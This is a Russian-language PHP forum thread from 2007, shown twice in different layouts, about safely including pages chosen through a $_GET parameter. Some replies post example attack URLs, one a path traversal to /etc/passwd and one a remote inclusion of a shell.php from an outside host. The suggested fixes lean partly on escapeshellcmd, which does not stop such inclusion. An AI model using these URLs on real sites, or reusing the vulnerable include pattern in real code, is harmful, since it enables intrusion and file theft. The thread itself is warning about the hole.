Вопрос по $_GET на PHP.

Tretyak · 25.06.2007, 11:17

Вот к примеру юзаю такую конструкцию:

<?php
$page = $_GET['page'];
echo " <li><a href=/files/qwerty.doc>Главная </a></li>
<li><a href=\"?page=1.php\">Лабы</a></li>
<li><a href=\"?page=lekcii.php\">Лекции</a></li>
";
?>

Потом в нужном слое подключаю страницу вот так:

<?php include("$page");?>

Естественно при первом заходе на страницу возникает ошибка, т.к. в $_GET['page'] ничего еще не передано, когда начинаю по ссылкам ходить - все нормально. Как исправить? Собственно интересует, как сделать, чтобы адреса в браузере писались типа так "http://seras.awarded.in/?set=muzon" .

P.S.: ссылки на учебники не давать

, имеются в наличии.

freelsd · 25.06.2007, 15:19

[PHP]<?php

// проверяем, есть ли вообще в массиве $_GET элемент "page"

if ( isset ( $_GET [ "page" ] ))
{
$filename = escapeshellcmd ( $_GET [ "page" ] ); // получаем имя файла, попутно избавляемся от спец-символов

// проверяем существование файла, который надо подключить

if ( is_file ( $filename ))
{
// подключаем нужный файл
include ( $filename );
}
else
{
// выводим сообщение, что файла такого нет
print "Страница не найдена";
}
}
else // если в $_GET ничего не передается
{
print "Неверный URL.";
}
[/PHP]

CRAZY · 25.06.2007, 20:42

шобы сделать, чтобы адреса в браузере писались типа так "http://seras.awarded.in/?set=muzon" , существует 2 метода форм - это method=post, и method=get (это в хтмл), пользовался на перле...

Tretyak · 25.06.2007, 20:58

2freelsd.
Спасибо, попробую.

2Crazy.
Это понятно блин

, ты написал бы КАК это сделать, пример конкретный.

CRAZY · 25.06.2007, 22:00

Вот так было в мойом скрипте перлоффском:
<form action="/cgi-bin/index.cgi" method="post или get">
ИМЯ:<input type="text" name="name" action="http://localhost/cgi-bin/index.cgi">
</input>
<br>ПАРОЛЬ: <input type="password" name="pass" action="http://localhost/cgi-bin/index.cgi">
</input>
<br><input name="submit" type="submit" value="ОТПРАВИТЬ">
</input>
</form>

Spyder · 25.06.2007, 22:16

2 ТопикСтартер
Это самописный двиг или паблик?
[Для просмотра данной ссылки нужно зарегистрироваться])
SeRaS-Home / Произошла ошибка!
Вам закрыт доступ на сайт. Причина: Попытка внедрить XXS

Что такое XXS? Может XSS?

Tretyak · 26.06.2007, 01:08

Самописный баг

.

2Крейзи.
У меня-то не форма, а просто ссылки или я чего-то не догоняю.

***Crantisz*** · 26.06.2007, 02:07

собственно freelsd все правильно написал, от себя лишь хочется добавить, что я бы не выводил сообщения об ошибке, а просто сделал бы редерект на нужный адрес с соответствующим параметром.
Делается это так

Код:

header("Location: http://www.adress.ru/index.php?page=1.php");

sidor · 26.06.2007, 10:22

Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, например так:
[Для просмотра данной ссылки нужно зарегистрироваться]
А это не есть гут...

dimazzz · 26.06.2007, 13:34

немного дополню код freelsd

[php]
<?php

// проверяем, есть ли вообще в массиве $_GET элемент "page"

if ( isset ( $_GET [ "page" ] ))
{
$filename = escapeshellcmd ( $_GET [ "page" ] ); // получаем имя файла, попутно избавляемся от спец-символов

//добавим расширение к имени файла
$filename .= ".php";
// проверяем существование файла, который надо подключить

if ( is_file ( $filename ))
{
// подключаем нужный файл
include ( $filename );
}
else
{
// выводим сообщение, что файла такого нет
print "Страница не найдена";
}
}
else // если в $_GET ничего не передается
{ //то выводим html форму
$string = <<<HTML;
<form action="" method="get" onchange="submit()">
<select name="page">
<option value="lekcii">Лекции</option>
<option value="knigi">Книги</option>
</select>
</form>
HTML;
print $string;
}
[/php]

в итоге по запросу адреса [Для просмотра данной ссылки нужно зарегистрироваться]
будет подгружаться файл knigi.php

Spyder · 26.06.2007, 17:27

Цитата:

Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, например так:
[Для просмотра данной ссылки нужно зарегистрироваться]
А это не есть гут...

Тогда уж

Код:

http://www.adress.ru/index.php?page=../../../../../etc/passwd

или ещё лучше

Код:

http://www.adress.ru/index.php?page=http://megaxeksite.narod.ru/shell.php

Ну в данном случае не катит, я проверял

freelsd · 27.06.2007, 01:18

ну, если мы тут вообще разводим "в гостях у сказки", тогда и проверять лучше не $filename . ".php", а dirname( __FILE__ ) . "/" . $filename, и выводить файлы стал бы не через include, а через strip_tags ( file_get_contents ( $filename ) , "<p><b><i><u><a><img><h1>..." );

Tretyak · 27.06.2007, 13:47

Спасибо, парни.

Tretyak · 27.06.2007, 14:13

Цитата:

Сообщение от sidor

Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, А это не есть гут...

Резонный вопрос: "зачем тогда их используют, в чем преимущество перед обычными <a href="kwfdsf.php">ssdf</a>? "

Конструкция dimazzz`a выдает ошибку: "Parse error: parse error, unexpected T_SL in z:\home\[Для просмотра данной ссылки нужно зарегистрироваться] on line 100". Строчка 100 - вот эта

$string = <<<HTML;

Spyder · 27.06.2007, 15:46

Цитата:

Резонный вопрос: "зачем тогда их используют, в чем преимущество перед обычными <a href="kwfdsf.php">ssdf</a>? "

Инклуд удобная функция, но опасная
Можно сделать так, создай на серве папку, например /includes/ и заливаешь туда свои файлы, которые нужно инклудить через $_GET
Естественно изменяешь скрипт с
include ( $filename );
на
include ( "/includes/"$filename );

Ещё можно добавить фильтрацию некоторых символов, например: "\" "/" "." ":"
Их часто используют при проведении PHP-Injection

dimazzz · 27.06.2007, 16:18

Цитата:

Сообщение от Tretyak

Резонный вопрос: "зачем тогда их используют, в чем преимущество перед обычными <a href="kwfdsf.php">ssdf</a>? "

Конструкция dimazzz`a выдает ошибку: "Parse error: parse error, unexpected T_SL in z:\home\[Для просмотра данной ссылки нужно зарегистрироваться] on line 100". Строчка 100 - вот эта

$string = <<<HTML;

ну естественно! убери сивол ";" в конце 100 строки

прошу прощенья - на автомате поставил

Tretyak · 27.06.2007, 17:01

А что она хоть делает эта строка тогда?

dimazzz · 27.06.2007, 17:07

все, начиная со строки
$string = <<<HTML
и заканчивая строкой
HTML;
будет восприниматься php как html код и будет помещено в переменную $string;
а потом мы просто выводим переменную $string

Tretyak · 27.06.2007, 17:14

Все равно ругается на $string = <<<HTML, "Parse error: parse error, unexpected T_SL.

dimazzz · 28.06.2007, 08:53

Цитата:

Сообщение от Tretyak

Все равно ругается на $string = <<<HTML, "Parse error: parse error, unexpected T_SL.

Убедись, что на срочке $string = <<<HTML
больше ничего нет после HTML
тогда заработает

Правила форума	Все альбомы	Сообщения за день	Регистрация
Поиск	Галерея		Пользователи

25.06.2007, 11:17	#1
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	Вопрос по $_GET на PHP. Вот к примеру юзаю такую конструкцию: <?php $page = $_GET['page']; echo " <li><a href=/files/qwerty.doc>Главная </a></li> <li><a href=\"?page=1.php\">Лабы</a></li> <li><a href=\"?page=lekcii.php\">Лекции</a></li> "; ?> Потом в нужном слое подключаю страницу вот так: <?php include("$page");?> Естественно при первом заходе на страницу возникает ошибка, т.к. в $_GET['page'] ничего еще не передано, когда начинаю по ссылкам ходить - все нормально. Как исправить? Собственно интересует, как сделать, чтобы адреса в браузере писались типа так "http://seras.awarded.in/?set=muzon" . P.S.: ссылки на учебники не давать , имеются в наличии. __________________ Последний раз редактировалось Tretyak; 25.06.2007 в 11:26.

25.06.2007, 15:19	#2
freelsd Знакомый Регистрация: 25.05.2007 Пол: М Сообщений: 48 Поблагодарил: 29 Поблагодарили 37 раз в 15 сообщениях Открыли хайд : 0 в этом сообщении 0 Всего	[PHP]<?php // проверяем, есть ли вообще в массиве $_GET элемент "page" if ( isset ( $_GET [ "page" ] )) { $filename = escapeshellcmd ( $_GET [ "page" ] ); // получаем имя файла, попутно избавляемся от спец-символов // проверяем существование файла, который надо подключить if ( is_file ( $filename )) { // подключаем нужный файл include ( $filename ); } else { // выводим сообщение, что файла такого нет print "Страница не найдена"; } } else // если в $_GET ничего не передается { print "Неверный URL."; } [/PHP] __________________ «мне не нужно много, достаточного самого лучшего»

25.06.2007, 20:42	#3
CRAZY Товарищ Регистрация: 30.04.2007 Пол: M Провайдер: ВолгаТелеком Сообщений: 268 Поблагодарил: 110 Поблагодарили 147 раз в 62 сообщениях Открыли хайд : 0 в этом сообщении 2 Всего	шобы сделать, чтобы адреса в браузере писались типа так "http://seras.awarded.in/?set=muzon" , существует 2 метода форм - это method=post, и method=get (это в хтмл), пользовался на перле... __________________ [Для просмотра данной ссылки нужно зарегистрироваться]

25.06.2007, 20:58	#4
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	2freelsd. Спасибо, попробую. 2Crazy. Это понятно блин , ты написал бы КАК это сделать, пример конкретный. __________________

25.06.2007, 22:00	#5
CRAZY Товарищ Регистрация: 30.04.2007 Пол: M Провайдер: ВолгаТелеком Сообщений: 268 Поблагодарил: 110 Поблагодарили 147 раз в 62 сообщениях Открыли хайд : 0 в этом сообщении 2 Всего	Вот так было в мойом скрипте перлоффском: <form action="/cgi-bin/index.cgi" method="post или get"> ИМЯ:<input type="text" name="name" action="http://localhost/cgi-bin/index.cgi"> </input> <br>ПАРОЛЬ: <input type="password" name="pass" action="http://localhost/cgi-bin/index.cgi"> </input> <br><input name="submit" type="submit" value="ОТПРАВИТЬ"> </input> </form> __________________ [Для просмотра данной ссылки нужно зарегистрироваться]

25.06.2007, 22:16	#6
Spyder Товарищ Регистрация: 01.03.2007 Пол: M Провайдер: АДС ADSL Сообщений: 315 Поблагодарил: 332 Поблагодарили 160 раз в 80 сообщениях Открыли хайд : 0 в этом сообщении 4 Всего	2 ТопикСтартер Это самописный двиг или паблик? [Для просмотра данной ссылки нужно зарегистрироваться]) SeRaS-Home / Произошла ошибка! Вам закрыт доступ на сайт. Причина: Попытка внедрить XXS Что такое XXS? Может XSS?

26.06.2007, 01:08	#7
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	Самописный баг . 2Крейзи. У меня-то не форма, а просто ссылки или я чего-то не догоняю. __________________

26.06.2007, 02:07	#8
*Crantisz* Заслуженные Регистрация: 19.04.2007 Адрес: slonstudio.org Пол: M Провайдер: ВТ Сообщений: 892 Поблагодарил: 271 Поблагодарили 495 раз в 221 сообщениях Открыли хайд : 0 в этом сообщении 19 Всего	собственно freelsd все правильно написал, от себя лишь хочется добавить, что я бы не выводил сообщения об ошибке, а просто сделал бы редерект на нужный адрес с соответствующим параметром. Делается это так Код: header("Location: http://www.adress.ru/index.php?page=1.php"); __________________ crantisz@jabber.ru P.S.

26.06.2007, 10:22	#9
sidor Приятель Регистрация: 23.03.2006 Адрес: Санкт-Петербург Пол: М Сообщений: 158 Поблагодарил: 1 Поблагодарили 56 раз в 8 сообщениях Открыли хайд : 0 в этом сообщении 1 Всего	Аккуратнее только с такими конструкциями, ибо таким макаром человек может запросить любую страницу с сервера, например так: [Для просмотра данной ссылки нужно зарегистрироваться] А это не есть гут... __________________ 01000100 01101111 01101110 00100111 01110100 00100000 01100110 01110101 01100011 01101011 00100000 01101101 01111001 00100000 01100010 01110010 01100001 01101001 01101110 00101100 00100000 01100110 01110101 01100011 01101011 00100000 01111001 01101111 01110101 01110010 01110011 01100101 01101100 01100110 00100001

26.06.2007, 13:34	#10
dimazzz Приятель Регистрация: 31.10.2006 Адрес: Нижний Новгород Пол: М Провайдер: ВТ Сообщений: 186 Поблагодарил: 202 Поблагодарили 117 раз в 49 сообщениях Открыли хайд : 0 в этом сообщении 13 Всего	немного дополню код freelsd [php] <?php // проверяем, есть ли вообще в массиве $_GET элемент "page" if ( isset ( $_GET [ "page" ] )) { $filename = escapeshellcmd ( $_GET [ "page" ] ); // получаем имя файла, попутно избавляемся от спец-символов //добавим расширение к имени файла $filename .= ".php"; // проверяем существование файла, который надо подключить if ( is_file ( $filename )) { // подключаем нужный файл include ( $filename ); } else { // выводим сообщение, что файла такого нет print "Страница не найдена"; } } else // если в $_GET ничего не передается { //то выводим html форму $string = <<<HTML; <form action="" method="get" onchange="submit()"> <select name="page"> <option value="lekcii">Лекции</option> <option value="knigi">Книги</option> </select> </form> HTML; print $string; } [/php] в итоге по запросу адреса [Для просмотра данной ссылки нужно зарегистрироваться] будет подгружаться файл knigi.php

27.06.2007, 01:18	#12
freelsd Знакомый Регистрация: 25.05.2007 Пол: М Сообщений: 48 Поблагодарил: 29 Поблагодарили 37 раз в 15 сообщениях Открыли хайд : 0 в этом сообщении 0 Всего	ну, если мы тут вообще разводим "в гостях у сказки", тогда и проверять лучше не $filename . ".php", а dirname( __FILE__ ) . "/" . $filename, и выводить файлы стал бы не через include, а через strip_tags ( file_get_contents ( $filename ) , "<p><b><i><u><a><img><h1>..." ); __________________ «мне не нужно много, достаточного самого лучшего»

27.06.2007, 13:47	#13
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	Спасибо, парни. __________________

27.06.2007, 17:01	#17
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	А что она хоть делает эта строка тогда? __________________

27.06.2007, 17:07	#18
dimazzz Приятель Регистрация: 31.10.2006 Адрес: Нижний Новгород Пол: М Провайдер: ВТ Сообщений: 186 Поблагодарил: 202 Поблагодарили 117 раз в 49 сообщениях Открыли хайд : 0 в этом сообщении 13 Всего	все, начиная со строки $string = <<<HTML и заканчивая строкой HTML; будет восприниматься php как html код и будет помещено в переменную $string; а потом мы просто выводим переменную $string

Результаты поиска
Тема	Раздел

27.06.2007, 17:14	#19
Tretyak Дружище Регистрация: 25.09.2006 Адрес: Мещера Сити. Пол: М Провайдер: АДС FTTB Сообщений: 767 Поблагодарил: 189 Поблагодарили 245 раз в 117 сообщениях Открыли хайд : 0 в этом сообщении 5 Всего	Все равно ругается на $string = <<<HTML, "Parse error: parse error, unexpected T_SL. __________________

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)